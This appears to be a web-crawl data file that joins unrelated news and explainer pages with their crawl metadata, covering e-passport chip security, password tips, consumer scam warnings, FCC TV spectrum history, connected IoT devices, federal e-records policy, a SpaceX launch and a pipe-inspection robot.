Phones attached to a femtocell burn far less power, too, possibly less than a comparable Wi-Fi connection, because the signal is strong and close. Cell phones tend to run down when they have to use higher power levels to punch through interference or reach distant cell base stations. | <urn:uuid:745ea575-74eb-4f77-a52b-b500126555b6> | CC-MAIN-2017-09 | https://arstechnica.com/gadgets/2010/06/small-is-beautiful-put-a-cell-in-your-house/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00439-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.954816 | 1,735 | 2.59375 | 3 |
Three industrial revolutions that have brought epic changes to the world of business are steam engines, mass production, and internet technology. Today, we are in the midst of what is often called the fourth industrial revolution – the convergence of physical things with the world of the internet: The Internet of Things (IoT). Let us give you three figures that show why the IoT creates challenges both long-term and immediate.
First, consider the number of IP-enabled devices such as cars, heating systems or production machines. The research database of the analyst firm Machina Research is expected to deliver around 14 billion of those connected things by 2022. Second, the ITU predicts that by 2015, 75 percent of the world’s population will have internet access. And third, the omnipresent mobile revolution: according to the mobile forecast from Cisco's Visual Networking Index , more than 3 billion smartphones and tablets will be in use globally by 2017.
Managers need to envision the valuable new opportunities that become possible when the physical world is merged with the virtual world and where potentially every physical object can be both intelligent and networked. And, starting now, they must create the organizations and IoT-based business models that can turn these ideas into reality.
The IoT for the Extended Enterprise
Three challenges that have been regularly encountered in IoT projects
More White Papers, Infographics and Brochures | <urn:uuid:6cba055e-c8a2-4a60-951b-6dd07a8d64ad> | CC-MAIN-2017-09 | https://www.bosch-si.com/internet-of-things/iot-downloads/iot-strategy/iot-based-business-models-white-paper.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00491-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927756 | 277 | 2.65625 | 3 |
All U.S. passports issued since June 2007 are electronic passports, or epassports, which have advanced digital security features. All epassports have a small gold logo printed on the cover. (See illustration at right)
The epassport is based on a contactless smart card chip embedded in the cover. Think of it as a computer with special security software inside your passport. Contactless refers to the fact that it is a wireless device, but it can only communicate over very short distances of an inch or two.
U.S. epassports do not use RFID tags (Radio Frequency IDentification), which are used mostly for simple insecure object-related identification and tracking such as the whereabouts of warehouse palets and products.
How epassports work ?
The contactless smart card chip securely stores information and uses its computer to provide enhanced security that protects the privacy and safety of the passport holder.
When the government makes the epassport book it places a digital version of the identifying information printed inside-including the photograph-on the epassport chip. The information is “signed” using a type of electronic seal, called a digital signature which stops any alteration of the stored electronic data..
Passport terminals at border control communicate with the epassport chip and check the “seal” to prove that the passport was issued by the U.S. government and that the information stored in the chip has not been changed.
Several other U.S. epassport security features prevent anyone from “skimming” or reading data out of the passport without you knowing it, say by standing next to you with a special reader, for example.
1. There is a radio frequency shield in the passport cover, so it cannot be read or even detected by any reading device when it is closed.
2. The epassport chip is “locked” with a key that is unique to each epassport. The border agent must first physically open your passport book to get the printed key to access the chip’s stored information.
3. The smart card chip encrypts, or scrambles, the data before transmitting it to the passport terminal, making the information useless to any eavesdropper.
4. The epassport chip only communicates over very short distances of one or two inches once it has been opened and unlocked.
A more secure travel document
The epassport is a far more secure travel document than a traditional paper passport because it provides an additional way of authenticating the printed information with an sealed electronic copy.
It is virtually impossible to counterfeit an epassport, because no one can duplicate the authentic U.S. digital seal on the electronic data. Furthermore, any change to the chip information breaks the seal, so tampering is evident to a border agent. If stolen, your passport picture could be replaced by a fraudulent one on the printed data page, but the digital copy of your picture on the chip can’t be changed without detection.
The sealed digital photograph ensures that you, as the bearer of the passport, are indeed the person to whom it was issued. At passport control, border agents can compare the person, the printed page and the chip information. These all have to match to confirm the identity of the person presenting the passport.
Four things to remember about the epassport
– Based on smart card technology
– Virtually impossible to counterfeit
– Far more secure travel document than a traditional paper only passport
– Built-in digital security protects your privacy and safety | <urn:uuid:e888bcda-2ad8-4b4e-a3ae-8b3a9fb21742> | CC-MAIN-2017-09 | https://www.justaskgemalto.com/us/us-electronic-passport/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00487-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.915601 | 730 | 3.015625 | 3 |
Top 10 cyber security tips
High profile hacking incidents continue to make headlines around the world. The Target data breach that compromised 40 million customer accounts is still reverberating around the retail universe, and earlier this month a hacker organization targeted CNET, the popular technology and consumer electronics site. The group claims it obtained over a million usernames, passwords and email addresses.
If you run a business and have valuable customer data to protect or even if you just enjoy visiting sites online and shopping at ecommerce hubs and want to keep your personal information safe, you may worry about hacker attacks. But there are steps you can take to reduce the risk. Here are 10 ways to keep your personal or business information safer.
- Make sure your password is secure. Passwords are the first line of defense. Use a password that contains both upper and lowercase letters as well as numbers and special characters. The more complex your password is, the harder it is for hackers to compromise.
- Never use personal information in your password. It’s a bad idea to use your name or that of a spouse, child or pet as a password. The same is true of birthdays or phone numbers, as this information is also widely available via a Google search of your name.
- Make sure your OS software is up to date. Hackers continuously come up with new ways to infiltrate security systems, so it pays to make sure your browser has the latest security patches. When prompted to update your operating system software, take time to do it.
- Don’t leave your computer unattended when logged in to a site. It can be tempting to leave your browser open if you have to leave your PC for a few minutes, but that’s a golden opportunity for snoopers. Close all applications and log off before you step away.
- Create a "burner" email address. It’s a good idea to open a free email account with sites like Gmail that you can give out when you’re required to provide an email online or open an ecommerce account. You’ll avoid spam at your primary address and reduce vulnerability.
- Password-protect mobile devices. Many people don’t bother creating a password or PIN for their mobile phone or tablet, which is a big mistake. Like PCs, phones and tablets typically have sensitive account information on them that also needs to be kept safe.
- Use different passwords for all the registered sites you visit. Many people make the mistake of using the same password for all the sites they visit, but that means that a hacking incident on one site compromises all of their online accounts.
- Change passwords frequently. If you change your password frequently, you’ll decrease the likelihood that you’ll lose valuable information in a hacking incident. Aim for making a change to all registered passwords approximately every 30 days.
- Set your email to read plain text only. One way hackers target victims is to monitor when emails are opened by embedding an image that displays automatically. If you set your email to display plain text only, you can manually open emails from trusted senders.
- Don’t keep a password list. If you’re following good security practices, you’ll create strong passwords and change them frequently. But keeping an unencrypted list of passwords on your PC defeats the whole purpose.
With sites worldwide under threat by attacks from increasingly sophisticated hacking groups, it makes sense to be concerned about your data, whether you run a business or are a casual Internet user. Since passwords are the primary line of defense, focus on creating strong passwords, and make sure you change them approximately every 30 days.
Keeping track of your passwords manually can be a challenge if you use many different sites, so it may be in your best interest to explore an automated password management solution. But whether you manage your passwords yourself or rely on a partner, make sure you follow these 10 tips to improve security and avoid handing account information to hackers.
Bill Carey is Vice President of Marketing & Business Development at Siber Systems Inc., which offers the top-rated RoboForm Password Manager solution. Find out more about RoboForm at http://www.roboform.com. | <urn:uuid:e9cade97-8942-4a40-a00e-4b407736b8e7> | CC-MAIN-2017-09 | https://betanews.com/2014/07/25/top-10-cyber-security-tips/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170700.71/warc/CC-MAIN-20170219104610-00007-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.915971 | 859 | 2.578125 | 3 |
In September of 1948, the average high temperature in Washington, D.C., was 79.8 degrees Fahrenheit, off just a tick from the historical average of 80.7. So it’s ironic that September would go down in history as the month of the Big Freeze – at least in the television business.
The freeze referred to an FCC decision to halt spectrum allocations for television broadcasting. At the time, 108 stations were on the air, and demand was mounting for permission to beam moving pictures and sound over frequencies within the 50 to 294 MHz range, a prized swath notable for its ability to convey signals over wide ranges and to penetrate walls.
The FCC faced industry pressure to open up assignments on request rather than to create a structured approach that would unify channels across the country. It was inflection point whose resolution would determine how a powerful medium would grow up, and the FCC realized the gravity of the moment. In September, the commission ordered a freeze on allocations for the next six months as it sorted through conflicting ideas for stewarding the nation’s television system.
Nicknamed the Freeze of 1948, the moratorium would extend for nearly four years as the commission wrestled with a changing technology environment – color TV among the new influences – and as the Korean War diverted the government’s attention. In April 1952, the FCC finally released its Sixth Report and Order, spelling out a national scheme for allocating frequencies for television broadcasting and painstakingly explaining its reasoning.
“It has been urged in this proceeding that as a matter of policy we should abandon the concept of a nationwide table of channel assignments and permit applicants from any community to apply for the use of any channels provided certain general engineering criteria were met,” the Report and Order said. “Upon careful consideration of the record in this proceeding we are convinced that the public interest requires our adherence to the concept of a table of channel assignments as the most effective method for assuring a fair distribution of television service throughout this country.”
Thus was established the still-prevailing system for TV broadcasting in the U.S. Hallmarks included frequency blocks of 6 MHz for television signals, geographic exclusivity of assigned frequencies, provisions for guarding against interference and the reservation of certain frequencies for educational television.
This cornerstone system, with adjustments over time for more frequencies and digital transmission technologies, has informed the broader telecommunications environment in ways the FCC could not have envisioned. The foundation for the cable industry’s breakthrough high-speed Internet specification, DOCSIS, has leaned mightily on the FCC’s channel allocation scheme for broadcast television by stuffing Internet packets into the same 6 MHz vessels that originally were sanctioned for over-the-air television. Only now, with the latest DOCSIS 3.1 iteration, does the specification abandon the notion of organizing bandwidth in 6 MHz chunks, instead inviting cable providers to assign whatever swaths of spectrum they choose for Internet traffic.
But the broadband Internet firmament will continue to borrow from the television past. In particular, an emerging approach for delivering high-speed Internet services wirelessly, known colloquially as TV White Space, mines familiar terrain. TV White Space implementations fetch unused slivers of spectrum originally assigned for TV broadcasts and run IP traffic across them, taking advantage of the same range and propagation qualities that have long benefitted broadcasters – hence the nickname “Super Wi-Fi.” The big difference is that the FCC treats TV White Spaces as unlicensed spectrum, meaning anyone can rig up a broadband IP network over these unused frequencies so long as they keep their signals from interfering with broadcasters’ assigned channels. (Database tables maintained by Google and others keep watch on which frequencies are available where.)
The FCC’s forthcoming auction of prized television spectrum complicates the picture for TV White Space a bit, giving would-be investors the shakes. But implementations are rising in the U.S. and elsewhere, with some backed by tech titans like Microsoft and Google.
In the fall of 1948, when the FCC took a breather to think carefully about how to orchestrate the development of TV broadcasting, the commission couldn’t have dreamed it would be influencing the development of broadband Internet access. But the decisions it made have done just that. Sixty-some years later, a scheme for over-the-air television might just change the landscape for high-speed Internet delivery, potentially helping to close broadband availability gaps for unserved communities. Score one for the freeze. | <urn:uuid:9c1c7381-cdab-4dfa-8057-ee774b0831ec> | CC-MAIN-2017-09 | https://www.cedmagazine.com/article/2014/02/memory-lane-broadband-alternative-heats | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171176.3/warc/CC-MAIN-20170219104611-00359-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949455 | 910 | 3.046875 | 3 |
Many are aware of the well-publicized Google Glass that pairs the Internet with a set of shades. What takes some by surprise, however, is how many other products have followed suit.
The trend has been dubbed with a variety of titles, such as the “Internet of Things” and the “Internet of Everything,” titles which — considering their ambiguity — could easily be dismissed for sheer lack of definition. However, a new report published by the Center for Data Innovation showcases just how diverse these “things” connected to the Internet can be.
Yes, that’s right, even garbage cans now be online. In this case, they come from BigBelly Solar company that has created a solar-powered trash can and compactor that uses its online connection to alert sanitation crews when it is full. While this trash can receptacle be found in certain cities, corporate campuses, colleges and parks, the report identified Boston University as a user that was able to use the receptacle’s waste data to reduce average weekly trash pickups from 14 to 1.6.
Photo: Flickr/Elvert Barnes
Bridges are best when sturdy and without missing pieces. In order to improve safety, researchers and engineers in the U.S. and around the world are using bridge sensors that can detect structural changes. In South Korea the technology has been put to use in the Jindo Bridge with more than 600 wireless sensors. Locally, researchers at the University of Maryland, College Park are using the sensors on the state’s I-495 Bridge to send automated email and text alerts to engineers if a structural threat is detected.
Photo: Flickr/Joel Burslem
Whether to reduce congestion, help with trip planning or enforce parking violations, smart parking sensors are being put to use by businesses and municipalities alike. ParkSight, a company specializing in parking sensors, is offering businesses a network of self-powered, wireless parking sensors to collect real-time data on the occupancy of individual parking spaces. The information is then transmitted to parking facility operators and drivers. For drivers, the sensors are handy because they can tell them where spots are available, the cost of use, and the maximum time limit for parking. For facility operators, the sensors can track parking violators and be used for digital signage.
Photo: Flickr/Doug Waldron
In St. Louis, the public bus service MetroBus is using electronic sensors to collect information on bus speed, engine temperature and oil pressure. Service technicians then receive computer recommended suggestions on the vehicle’s maintenance needs. According to the report, the improved maintenance — or preventive care for buses — has saved the city $5 million per year in servicing costs and another $5 million in personnel-related costs.
This is a product that could benefit the food service industry’s infection-conscious consumers. HyGreen is currently using their hand-washing reminder and recording system in hospitals to prevent the spread of diseases. The system works by detecting when someone is washing their hands by logging a worker’s location, ID number (via a small electronic badge) and the time. If an infection does occur within a hospital, the system provides hospital managers with better data to understand how and when it may have occurred.
Photo: Flickr/Horia Varlan
Offering parents and coaches a record of blunt force, a small and flexible sensor now links helmets to the Web. The sensor hails from Shockbox, a company that pitches the helmet sensor as a way to eliminate the guesswork on possible concussions and to improve injury notifications to parents.
The Shockbox mobile app shows the direction and severity of impacts while also noting the name of the player and the date and time of the event. If a concussion-level force does occur, parents and coaches can get notifications immediately through the app. According to the report, athletic head injuries cause 21 percent of traumatic brain injuries among U.S. children and teens.
Photo: Flickr/Keith Allison
Produced by the companies GE and Quirky, the Egg Minder, is an egg carton that notes the number of eggs in the container and the length of time they’ve been sitting. The smart carton works by using sensors implanted in the bottom of each the 14 egg cups. A line of LED lights in the tray display which eggs are oldest and need to be used first. The tray also functions as a grocery list reminder, sending a smartphone alert when eggs are running low.
Photo: Flickr/Mark Turnauckas
Prescriptions are prescribed for a reason, but that doesn’t mean they’re heeded. In response to our forgetful nature, Vitality has invented smart pill bottles, "GlowCaps," that act as a gentle reminder when a patient has forgotten to down their typical dosage. The pill box triggers a series of escalating notifications that include flashing lights, text messages, audio reminders and phone calls. The tiny canister can detect when a patient opens and closes the bottle and notes each opening as a dose. As an added benefit, family members, caregivers and doctors can have access to dosage reports online. The report’s research said the smart pill bottles from Vitality have increased medication compliance in users from about 70 to 95 percent. The health-care costs linked with noncompliance with prescribed medications is estimated to be $290 billion annually in the U.S.
If homeowners are looking for a real-time account of their water usage — to identify a leak, be more conservative, or just check the accuracy of a utility bill — Belkin Echo Water has created a water monitoring system that can put home plumbing online. The system employs sensors to chronicle water usage through the vibrations in pipes and then use algorithms to analyze those vibrations, identifying water fixtures (including showers, toilets and irrigation) and logging when each is used, how long, and the amount of water consumed. The system is expected to be rolled out to the public in 2014.
Digital products can now send air quality data to a smartphone. One such product is the Air Quality Egg, a device that senses and collects data about air quality in a home or office. The data is gathered in real time and is relayed over the Internet where a website aggregates the data from every “Egg” in use. The result is a network of air quality data, reporting on levels of carbon monoxide and nitrogen monoxide. While the EPA publishes daily pollutant levels from centralized locations in metropolitan areas, the Egg offers specific data for personal use. | <urn:uuid:d9deb282-1f19-487f-b172-d708c4372007> | CC-MAIN-2017-09 | http://www.govtech.com/internet/10-Surprising-Things-Connected-to-the-Internet.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00235-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.939286 | 1,340 | 2.640625 | 3 |
Old-school recordkeeping meets the Digital Age
How does the government manage data that was born digital, meaning it was created in electronic form? Organizations as varied as the National Archives and Records Administration (NARA), the White House, open-government groups, and House members have recently offered recommendations for managing the growing volume of such information. Their approaches underscore the differences of opinion about how much responsibility and power various entities should have over future federal recordkeeping.
Electronic records management has been the topic of proposed legislation and rules, court cases, congressional investigations, hearings, and government audits as agencies weigh options for maintaining the vast amount of official communication that is conducted electronically. Because federal employees use e-mail and other technologies daily for routine notes and important information, it’s not always easy to decide which messages qualify as records that must be preserved. And once a decision is made, the next question is how best to store the messages.
Under the Federal Records Act, NARA approves agencies’ recordkeeping schedules and maintains data once it is submitted for archiving, but each agency decides whether to keep a document. In the case of e-mail messages, individual users typically make the decision.
“I think there is a growing consensus that electronic mail and other forms of electronic records that are born digital need to be managed and preserved in electronic form,” said Jason Baron, NARA’s director of litigation.
But lacking a statutory prescription for maintaining electronic records, most agencies print and file them as they would paper documents, according to a recent investigation by the Government Accountability Office. GAO’s report states that top agency officials are not properly maintaining their electronic communications, and NARA has not been inspecting agencies’ recordkeeping practices.
Those revelations provided fuel for House Democrats who were already angered by allegations that White House officials lost millions of e-mail messages generated during the prelude to the invasion of Iraq.
NARA has less power over how a presidential administration handles its records while in office. The Presidential Records Act governs the White House.
On July 9, the House passed the Electronic Message Preservation Act, a bill that would amend both the Presidential Records and Federal Records acts and significantly increase the authority NARA has over the White House’s recordkeeping practices. The measure would also require agencies to preserve electronic communications in a NARA-approved format.
Bush administration officials have indicated that the president would veto the measure. An administration statement also said the proposed reforms for presidential records would “upset the delicate separation-of-powers balance” by giving NARA new authority over a presidential administration.
However, open-government groups say the measure does not go far enough.
On July 31, NARA issued guidance to help agencies use e-mail archiving applications. The agency also has proposed new recordkeeping regulations that would define electronic records management in broader terms and provide guidance for inspections of agency records management practices.
How much power should NARA have?
Although NARA, open-government groups and lawmakers share the goal of improving the mangement of federal and presidential records, their ideas about what approach to take vary widely.
In particular, they disagree on the role NARA should play in enforcing agencies’ recordkeeping practices. Some experts say NARA should abandon its cooperative stance toward agencies and become more of an enforcer.
“The problem NARA has is — and they admit this — they operate on a sort of friendly basis with agencies, and they don’t threaten them,” said Meredith Fuchs, general counsel at George Washington University’s National Security Archive. “They don’t push too hard.”
The National Security Archive, a research institute and library, has filed about 35,000 Freedom of Information Act requests since its inception in 1985. It is one of the groups suing the Bush administration for allegedly failing to archive millions of e-mail messages.
The bill that passed the House in July would require NARA to issue regulations to compel agencies to preserve electronic messages in an electronic format and create certification standards for agencies’ electronic records management systems. The White House would need to meet a similar standard determined by NARA, and presidential recordkeeping practices would be subject to the agency’s approval.
NARA officials have publicly questioned whether the Justice Department would support the agency’s increased oversight role in presidential recordkeeping.
A proposed rule change published in the Aug. 4 Federal Register would have NARA providing guidance for its inspections of agencies’ records management practices. Furthermore, officials would undertake inspections when an agency fails to address risks or specific problems, the notice states.
Nancy Allard, a senior policy specialist at NARA, said the proposed regulations would make inspections more focused.
“What we are looking at is how we can do a combination of more effective agency self-assessment and then planned targeting for a specific issue and what will invoke an inspection,” she said.
Patrice McDermott, director of OpenTheGovernment.org, said she found NARA’s proposed changes to be disappointing because they only called for inspections in high-risk situations. NARA “has chosen, once again, to reject its ongoing responsibility to conduct inspections or surveys of the records and the records management programs and practices within and between federal agencies,” she said.
On the other hand, J. Timothy Sprehe, a records management expert who often writes about the topic in his Federal Computer Week column, said NARA already has enough to do. Rather than giving the agency more oversight responsibilities, the best plan would be to automate electronic recordkeeping, he said.Are all records created equal?
Under current regulations, NARA does not require agencies to maintain records in their native formats. So for now, many agencies still print e-mail messages and file the paper versions.
Although the filing process is relatively easy, the practice has a major weakness: It eliminates the searchability of digital documents.
“Those laws didn’t really anticipate the development of our electronic communications systems, and so the agencies on their own have not taken the initiative to deal with all of this,” Fuchs said.
NARA’s Electronic Records Archives system, which is in development, will have an enhanced ability to maintain records in all electronic formats — a capability that will become increasingly necessary as the demand for electronic discovery for legal cases grows.
Baron said NARA’s recent guidance about e-mail archiving applications was important because it reminded agencies that adopting such tools does not necessarily mean they are managing records correctly.
Agencies “need to be aware of the records management implications of [saving everything] and take steps to think about what makes sense in terms of saving permanent records and being able to tag and dispose of temporary records,” he added.
NARA’s July 31 guidance outlined the benefits and drawbacks of using e-mail archiving technology to retain electronic messages that qualify as records. It also required agencies to provide training to ensure that their employees maintain the records correctly.
Baron said NARA has been addressing federal electronic records management for decades, and the adoption of electronic records management tools by agencies offers a mixed picture.
“This is a universal problem,” he said. “It’s a matter of public trust — and that’s why it’s important for federal agencies to be aware of their options with respect to preserving information in electronic form.” | <urn:uuid:8cec10ef-793c-4f3e-9048-59667e1733d6> | CC-MAIN-2017-09 | https://fcw.com/articles/2008/08/15/oldschool-recordkeeping-meets-the-digital-age.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170708.51/warc/CC-MAIN-20170219104610-00355-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949066 | 1,545 | 2.828125 | 3 |
Here are some common scams along with ways to protect yourself:
U.S. Census Scam
How it works: Someone calls you claiming to be from the Census, the IRS or other “trusted” organization and asks you to divulge personal financial information, donations, and/or Social Security numbers. In addition, fraudsters now have devices that can make Caller ID display any number or name they choose such as "U.S. Census" or a similar identifier. In rare instances, a Census worker may call to clarify information you've submitted, according to the Census Web site.
How to protect yourself: Never give out financial or personal information over the phone unless you are certain of the identity of the person or company who is requesting it.
How it works: Phishing e-mail messages are designed to steal your identity. They get your personal data by directing you to phony, but very realistic "secure" Web sites. The phony URL is a total knock-off of a company's legitimate log-in site. The sole purpose is to trick you into divulging your personal information so the operators can steal your identity and run up bills or commit crimes in your name.
How to protect yourself: Legitimate companies don’t ask for personal information via email. If you are concerned about your account, contact the company mentioned in the email using a telephone number you know to be genuine. Don’t cut and paste the link from the message into your Internet browser — phishers can make links look like they go to one place, but that actually send you to a different site. Also, review credit card and bank account statements as soon as you receive them to check for unauthorized charges.
Mystery Shopper Scam
How it works: You receive a notice stating that you’ve been selected to participate in a “Mystery Shopper” program. Along with the notice, you receive a check and are asked to wire money back through a money transfer company, such as Moneygram or
How to protect yourself: If you receive this type of notice, delete it or throw it away. Do not send the money and do not cash the check.
How it works: Slamming is a term for an unauthorized change to your long distance company. This often happens when you sign up for a contest or other marketing promotion without checking the fine print. The company then has authority to switch you from your current long distance company. Cramming is similar, but involves a company placing an unauthorized miscellaneous charge on your phone bill. This could involve a charge for a voice mail service, Internet access services, or other service charges.
How to protect yourself: Read the fine print when you agree to a sales pitch or contest over the phone or in person and check all details on your phone bill regularly. If you see a suspicious charge, use the contact information provided to ask about the charge. If you cannot resolve the situation and you didn't authorize the charge, contact CenturyLink.
Advance Fee Scam
How it works: You receive a letter, fax or email from someone claiming to be or to have connections with foreign government officials who have access to millions of dollars in untraceable funds that they want to transfer out of their country. All you have to do is reply and provide your bank account information so the money can be transferred to a legitimate recipient - you. They will then demand that you send them money to cover the bribes and other expenses associated with the transfer. After many months, you finally learn that you got nothing from the deal but money taken from your bank account.
How to protect yourself: Don’t pay attention to get rich quick schemes. Delete, shred or throw away any correspondence you may receive.
How it works: This is a general term that involves someone trying to convince you that they are someone they're not, in order to collect critical personal information from you. Sometimes that person will claim to be a phone company representative. The person may say you overpaid your last phone bill and they need some information from you, including your Social Security number, to process a refund check.
How to protect yourself: Overpayments are almost always applied to your next bill with no need to call you to process a refund. Ask questions and for a callback number but do not provide personal information over the phone or via email.
How it works: In this scam, you might receive an email, page, or cell phone text message urgently asking you to call someone in the "809" area code or some other area code that you normally don't call. If you make the call, you may unwittingly dial into an expensive overseas pay-per-call service, resulting in large charges being placed on your next phone bill.
How to protect yourself: If you don't recognize the phone number or area code, don't return the call.
Bottom line: Never give out information to people you don’t know, and always review your phone bill carefully. If you see any suspicious activity, contact CenturyLink at the number listed on your bill. By working together, we can help reduce scams that take advantage of our customers.
CenturyLink is a leading provider of high-quality voice, broadband and video services over its advanced communications networks to consumers and businesses in 33 states. CenturyLink, headquartered in | <urn:uuid:66aa7d42-a641-4f06-964a-b64d2f8b2ddd> | CC-MAIN-2017-09 | http://news.centurylink.com/news/centurylink-urges-customers-not-to-be-fooled-by-scams | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170794.46/warc/CC-MAIN-20170219104610-00051-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94119 | 1,092 | 2.890625 | 3 |
After a successful liftoff this morning, the SpaceX Dragon spacecraft is on its way to rendezvous with the International Space Station.
"Very excited to be back here. We're a launch company and we love to launch," said Gwynne Shotwell, president of SpaceX, before launch. "We're prepared to fly."
However, the flight hasn't been without issue.
Shortly after Dragon reached orbit, SpaceX founder and CEO Elon Musk reported on Twitter that there was a problem with the Dragon spacecraft's thruster pods, delaying the deployment of the craft's solar array, which powers it.
"Issue with Dragon thruster pods. System inhibiting three of four from initializing. About to command inhibit override," Musk tweeted. "Holding on solar array deployment until at least two thruster pods are active."
At approximately 11:50 a.m. ET, the Dragon's solar arrays were successfully deployed.
The SpaceX Falcon 9 rocket, carrying the unmanned Dragon capsule, lifted off from Cape Canaveral Air Force Station in Florida at 10:10 a.m. ET today. The spacecraft, which is scheduled to rendezvous with the space station on Saturday, is ferrying 1,268 pounds of scientific experiments and supplies for the space station crew to the orbiter.
Using a robotic arm onboard the space station, two astronauts on Saturday are set to grab hold of the Dragon capsule and attach it to the station. The capsule will stay attached for about three weeks, returning to Earth on March 25.
Today's launch is the U.S. commercial mission"> second of 12 SpaceX flights contracted by NASA to resupply the space station. It also will be the third trip by a Dragon capsule to the orbiting laboratory.
After SpaceX made a demonstration flight in May 2012, it then launched the first official resupply mission last October, delivering 882 pounds of supplies.
Another successful commercial launch is an important milestone for NASA, which now depends on commercial flights since retiring the agency's fleet of space shuttles in the summer of 2011. For the foreseeable future, NASA will need commercial missions to ferry supplies, and possibly even astronauts, to the space station, while the space agency focuses on developing robotics and big engines in preparation for missions to the moon, asteroids and Mars.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is email@example.com.
Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
This story, "NASA, SpaceX launch Dragon but glitch delays power supply" was originally published by Computerworld. | <urn:uuid:0db81c83-4c93-465d-b24f-6969adcbc746> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2164033/data-center/nasa--spacex-launch-dragon-but-glitch-delays-power-supply.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00579-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.944557 | 565 | 2.640625 | 3 |
A snake has been moving through the pipes and systems of a nuclear power plant near Vienna, Austria.
It may not be as creepy as you think. This particular snake is multi-jointed robotic machine.
Carnegie Mellon University's robotic snake climbs a 1-in. machinery cord at the Zwentendorf nuclear power plant in Austria. (Photo: Carnegie Mellon)
The robot, which is 37 inches long and two inches in diameter, is tethered to a control and power cable. The robot crawled through the Zwentendorf nuclear power plant's steam pipes and connecting vessels as a test of its abilities.
The robotic snake proved it was able to maneuver through multiple bends, slip through open valves and negotiate vessels with multiple openings, according to researchers at Carnegie Mellon University's Robotics Institute, where it was developed.
That means the robot can inspect areas of the power plant that previously had been unreachable.
"Our robot can go places people can't, particularly in areas of power plants that are radioactively contaminated," said Howie Choset , a robotics professor at Carnegie Mellon. "It can go up and around multiple bends, something you can't do with a conventional borescope, a flexible tube that can only be pushed through a pipe like a wet noodle."
The robot, which also has been tested in search-and-rescue environments, is made up of 16 modules, each with two half-joints that connect with corresponding half-joints on adjoining modules. It also has 16 degrees of freedom, enabling it to assume a number of configurations and to move using a variety of gaits.
The robot has a video camera and LED light attached to its head, giving its controllers an image of what it's approaching. The university explained that even though the robotic snake is twisting, turning and rotating as it moves through pipes and over obstacles, the image remains steady because it's automatically corrected to be aligned with gravity.
The university's robotic research team sent the snake into a variety of pipes at the power plant, which was built in the 1970s but never used. Since it doesn't have any radioactive contamination, the plant was ideal for testing the robot.
Nuclear power plants in general have miles of pipes for carrying water and steam. Much of that piping is difficult or nearly impossible to inspect because of its positioning and because radioactivity limits people from being in specific areas.
Kevin Lipkin, senior systems engineer at the Robotics Institute, said in a statement that the longest deployment in a pipe during the Zwentendorf testing was 60 feet.
"We could have gone farther, but we need to figure out how to best manage longer deployments," he said. "We were just being cautious because it was our first time in this plant."
Carnegie Mellon scientists aren't the only ones who have been working on robotic snakes.
In 2008, the Sintef Group, a research company based in Trondheim, Norway, announced that it had designed its own robotic snake. Sintef's robotic snakes, were 1.5-meters long and made of aluminum. They were designed to inspect and clean complicated industrial pipe systems that are typically narrow and inaccessible to humans. These robots also had multiple joints to enable them to twist vertically and climb up through pipe systems to locate leaks in water systems, inspect oil and gas pipelines and clean ventilation systems.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is firstname.lastname@example.org.
Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
This story, "Robotic snake ssslithers through nuclear plant" was originally published by Computerworld. | <urn:uuid:0513a531-79d5-4a69-b1f8-aaccf90adbaa> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2168012/data-center/robotic-snake-ssslithers-through-nuclear-plant.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00579-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.969612 | 790 | 3.640625 | 4 |
An old saying says “nature abhors a vacuum,” meaning that in the absence of something nature will find a way of filling that gap. We are currently witnessing the same phenomenon in the information security field.
Information security has grown from being a small subset of IT to now being something of critical importance, not just to organizations but also to industries, economies and nations. As we become more and more dependent on the Internet, and computers control more and more of our daily lives, they also become a bigger risk to the stability of our businesses, economies, and our critical network infrastructure.
These risks have been recognized by governments around the world. US President Barack Obama has stated that “the cyber threat to our nation is one of the most serious economic and national security challenges we face.” Jonathan Evans, head of the UK’s secret service MI5, highlighted in July 2012 that the online threat to the United Kingdom was comparable to that posed by terrorists and said there were “industrial-scale processes involving many thousands of people lying behind both state sponsored cyber espionage and organized cybercrime”.
Yet despite all this rhetoric about computer security, there is still a lack of clear leadership on how to deal with the problem. Various countries have published their cyber security strategies, yet many have not shown any evidence of implementing those strategies in any demonstrable manner. We have seen individuals appointed as cyber security advisor (or tsar) positions in a number of countries, who then quickly resign and cite the lack of resources and support as obstacles to fulfilling their roles effectively.
The Convention on Cybercrime was one of the first treaties developed to enable an international legal framework to deal with online criminal acts. However, since its adoption by the Committee of Ministers of the Council of Europe in 2001, only thirty of the forty seven countries who have signed the agreement have actually ratified it and made it law.
